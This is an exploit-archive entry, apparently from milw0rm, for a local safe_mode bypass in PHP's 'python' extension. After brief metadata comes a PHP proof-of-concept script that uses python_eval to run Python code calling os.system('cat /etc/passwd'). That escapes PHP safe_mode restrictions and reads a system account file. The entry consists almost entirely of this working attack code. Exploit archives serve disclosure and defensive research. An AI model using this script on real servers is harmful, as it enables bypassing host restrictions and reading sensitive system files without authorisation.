[] NeoSense

PHP 'python' Extension - 'safe_mode' Local Bypass

Author: Amir Salmani
type: local
platform: multiple
port: 
date_added: 2008-12-16 
date_updated:  
verified: 1 
codes: OSVDB-53573 
tags: 
aliases:  
screenshot_url:  
application_url: 

<?php
/*
  php_python_bypass.php
  php python extension safe_mode bypass
  Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

# milw0rm.com [2008-12-17]